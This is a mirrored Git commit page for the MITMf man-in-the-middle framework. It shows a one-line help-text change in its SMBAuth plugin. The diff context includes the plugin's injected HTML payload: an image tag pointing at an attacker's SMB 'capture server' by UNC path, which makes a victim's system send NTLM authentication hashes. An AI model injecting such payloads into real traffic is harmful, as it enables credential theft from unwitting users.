mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 05:22:15 -07:00
formatting
This commit is contained in:
parent
1b6841f9c1
commit
eedb48822a
4 changed files with 10 additions and 7 deletions
|
@ -12,7 +12,7 @@ class SMBAuth(Inject,Plugin):
|
|||
self.html_payload = self._get_data()
|
||||
|
||||
def add_options(self,options):
|
||||
options.add_argument("--host", action="store_true", help="The ip address of the SMB server")
|
||||
options.add_argument("--host", action="store_true", help="The ip address of your capture server")
|
||||
|
||||
def _get_data(self):
|
||||
return '<img src=\"\\\\%s\\image.jpg\">'\
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue